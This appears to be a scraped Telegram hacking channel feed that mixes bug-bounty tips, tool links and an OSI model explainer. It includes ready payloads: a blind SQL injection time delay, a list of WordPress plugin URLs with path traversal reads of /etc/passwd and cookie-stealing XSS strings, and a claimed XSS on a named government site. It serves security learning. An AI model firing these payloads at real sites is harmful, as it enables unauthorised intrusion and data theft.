2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
⚡️Wordpress Endpoints to look -
check this if you have these plugin. ⚡️
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Deobfuscation and analysis
of client-side JavaScript code
to detect DOM-based XSS.
Join the discussion group guys
/channel/bug_hunting_talks
today i got an intresting reflected xss, in karnataka gov website
/kn where the lang_name param is vulnerable
Thanks, guys for this suggestion I was stuck but seeing the money and the content provided by hackthebox academy, i am planning to first take the CPT as it covers almost all the topics and also so many people says that the exam. Is more tougher than oscp, so after reading all those articles and redit suggestion and youtube review, I am planning to first complete the CPT, once done later I will take the OSCP. And I also suggest you guys this only if you are a beginner or a intermediate, first take the alternative courses to oscp, and once you get things done, you will get confident and later you can pass the oscp in one time. Bec it cost a lot........ 🤑💰
Читать полностью…
Follow the Tech Tips and_hacking channel on WhatsApp: https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A
Читать полностью…
Add the folder 'home/000~ROOT~000/' to your wordlist, and you might discover some juicy data. Enjoy!"
Читать полностью…
OSI Model
____ __ _
The OSI (Open Systems Interconnection) model is a conceptual framework used to understand and standardize the functions of a networking system. It divides the process of communication in a network into seven distinct layers, each responsible for different aspects of data transmission.
The Seven Layers:
1️⃣Physical Layer (Layer 1): Deals with the physical connection between devices, including cables, switches, and the transmission of raw binary data.
2️⃣Data Link Layer (Layer 2): Manages the data frames between two directly connected nodes and handles error detection and correction.
3️⃣Network Layer (Layer 3): Responsible for logical addressing and routing, ensuring that data packets are sent from the source to the destination across multiple networks.
4️⃣Transport Layer (Layer 4): Provides end-to-end communication, error recovery, and flow control between devices, often using protocols like TCP and UDP.
5️⃣Session Layer (Layer 5): Manages sessions or connections between applications, establishing, maintaining, and terminating communication.
6️⃣Presentation Layer (Layer 6): Translates data between the application layer and the network, handling data encryption, compression, and conversion.
7️⃣Application Layer (Layer 7): Interfaces directly with the end user, providing network services such as email, file transfer, and web browsing.
Video coming soon guys
Give a lot of reaction to this
#Tech_book
#cryptography
"Cryptography and Embedded Systems Security", 2024.
https://cyfare.net/
- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox
Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html
Читать полностью…
Analysis of CVE-2024-43044 — From file read to RCE in Jenkins through agents
https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
☄️AutoRecon- It is a multi-threaded network reconnaissance tool which performs automated enumeration of services.
🔗https://github.com/Tib3rius/AutoRecon
Actually I am using foreign number soo not to worry if It's ban in India.
Читать полностью…
pawan_rawat/github-recon-for-finding-sensitive-information-aecdeb9c9dce" rel="nofollow">https://medium.com/@pawan_rawat/github-recon-for-finding-sensitive-information-aecdeb9c9dce
Читать полностью…
I am really. Sorry guys, I left my place bec of some emergency work. I will only coming back on Monday soo I will not going to be active till Monday, soo please don't mind.
Читать полностью…
Small update on the upcoming video
I will upload it soon😌
I was Meditating for Ideas And This Popped up
" The Thoughts From Universe"
Idk We will call It whatever
Coz I am not familiar with this concept
Says That
Universe Live At Harmony at Neutral state(=) and That's the Refresh point
But Grows and Falls on charge state ( - or +)
Means At charged State It Grows
Eg - Success and Failure
And In Charge state
Both comes in one Hand
If There success then Failure Will be must And
Both success and Failure will try to be of Equal charge
Eg - 10 wins Means Mostly You will get 10 Failure too After the Wins
But At fall state You can Neutralise It by Wins Or Something Polar opposite to That
To Refresh the starting point
Like If You Are Having Intense Cravings about Something
Then Then Think Painful thoughts about that Addiction
Then Thing will neutralise
I Just Wrote this down
Coz I found this interesting
And It's A Thought from somewhere in Universe
I know it sounds lots like Yapping
But I would take it seriously
- Aijak Ofc
Bug-Bounty notes
>💛Welcome to the Future of Cybersecurity
>Overview
👣OSINT
ℹ️Recon Tips
>✳️Mastering the Art of Writing Clear and Effective Vulnerabilities Report
>Twitter
🌆Subdomain Enumeration
>Tools
🔑Nmap's NSE Scripts for Ethical Password Testing
👻Cheat-sheet's
>Exploitation
Link 🔗:-
Https://book.cipherops.xyz
Author: @laazy_hack3r
@GitBook_s
LFI | RFI | Traversal Cheat Sheet 🔰
🔖#infosec #cybersecurity #hacking #pentesting #security
#Cyber_Education
Using SeTcbPrivilege for educational purposes
https://github.com/daem0nc0re/PrivFu/tree/main/PowerOfTcb